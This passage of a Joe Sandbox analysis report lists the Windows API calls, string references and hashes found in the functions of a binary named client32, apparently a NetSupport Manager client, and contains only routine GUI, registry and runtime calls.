                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3136964118-2830328467
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
                                                                              • _free.LIBCMT ref: 110ED81C
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _malloc.LIBCMT ref: 110ED82E
                                                                              • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                              • _free.LIBCMT ref: 110ED8E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                              • String ID: Error %d getting %s
                                                                              • API String ID: 582965682-2709163689
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9
                                                                                • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
                                                                                • Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
                                                                                • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
                                                                              • _memmove.LIBCMT ref: 1100FA4D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                              • String ID: invalid string position$string too long
                                                                              • API String ID: 443534600-4289949731
                                                                              APIs
                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,759223A0,1100BF7B), ref: 11110928
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                              • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                              • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                              • IsWindow.USER32(?), ref: 1103D17E
                                                                              • SendMessageA.USER32(?,0000004A,00040414,00000492), ref: 1103D1B8
                                                                              • _free.LIBCMT ref: 1103D1BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                              • String ID: Show16
                                                                              • API String ID: 625148989-2844191965
                                                                              APIs
                                                                                • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                              • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                              • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                              • IsA(), xrefs: 1100968D, 110096B5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                              • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 863766397-389219706
                                                                              APIs
                                                                              • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                              • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                              • API String ID: 2735369351-763374134
                                                                              APIs
                                                                              • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                              • BeginPaint.USER32(?,?), ref: 110056E8
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                              • EndPaint.USER32(?,?), ref: 1100572F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                              • m_hWnd, xrefs: 110056C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1216912278-2830328467
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(75A77AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
                                                                              • GetCursorPos.USER32(110C032C), ref: 110B94D6
                                                                                • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
                                                                              • PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
                                                                              • ClientToScreen.USER32(?,110C032C), ref: 110B9516
                                                                              • SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
                                                                              • SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                              • String ID:
                                                                              • API String ID: 3235510773-0
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(111F1BC0), ref: 111399AD
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • De-Inited VolumeControl Subsystem (OK: 0 ref's)..., xrefs: 11139A10
                                                                              • UI.CPP, xrefs: 111399BD
                                                                              • "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value), xrefs: 111399C2
                                                                              • De-Initing VolumeControl Subsystem..., xrefs: 11139994
                                                                              • De-Inited VolumeControl Subsystem (Ref's Outstanding!)..., xrefs: 111399CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DecrementErrorExitInterlockedLastMessageProcesswsprintf
                                                                              • String ID: "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value)$De-Inited VolumeControl Subsystem (OK: 0 ref's)...$De-Inited VolumeControl Subsystem (Ref's Outstanding!)...$De-Initing VolumeControl Subsystem...$UI.CPP
                                                                              • API String ID: 1808733558-973815363
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                              • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                              • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                              • _free.LIBCMT ref: 1100B3C8
                                                                              • _free.LIBCMT ref: 1100B3CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                              • String ID:
                                                                              • API String ID: 705253285-0
                                                                              APIs
                                                                              • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                              • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                              • API String ID: 2776021309-3012761530
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1101D66E
                                                                              • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                              • RegisterClassExA.USER32(00000030), ref: 1101D6F1
                                                                              • GetLastError.KERNEL32 ref: 1101D6F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                              • String ID: 0
                                                                              • API String ID: 430917334-4108050209
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                              • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 468487828-934300333
                                                                              • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                              • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                              • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                              • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                              • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 468487828-934300333
                                                                              • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                              • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                              • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                              • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                              APIs
                                                                              • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                              • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                              • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                              • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                              • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                              • String ID:
                                                                              • API String ID: 2375713580-0
                                                                              • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                              • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                              • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                              • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
                                                                              • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
                                                                              • SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
                                                                              • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
                                                                              • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
                                                                              • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 414154005-0
                                                                              • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                              • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                              • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                              • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 111715AE
                                                                                • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                              • __amsg_exit.LIBCMT ref: 111715CE
                                                                              • __lock.LIBCMT ref: 111715DE
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                              • _free.LIBCMT ref: 1117160E
                                                                              • InterlockedIncrement.KERNEL32(02CD16E8), ref: 11171626
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                              • String ID:
                                                                              • API String ID: 3470314060-0
                                                                              • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                              • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                              • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                              • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                              • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                              • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$EventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2857295742-0
                                                                              • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                              • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                              • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                              • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                              • GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                              • GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                              • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                              • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                              APIs
                                                                              • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                              • EqualRect.USER32(?,?), ref: 1107740C
                                                                              • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                              • m_hWnd, xrefs: 11077447
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$DeferEqualPointsRect
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 1104971C
                                                                              • _free.LIBCMT ref: 11049779
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • CLTCONN.CPP, xrefs: 11049708
                                                                              • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                              • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
                                                                              • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 110BD4A4
                                                                              • GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
                                                                              • DrawMenuBar.USER32(?), ref: 110BD50D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                              • m_hWnd, xrefs: 110BD493
                                                                              Memory Dump Source
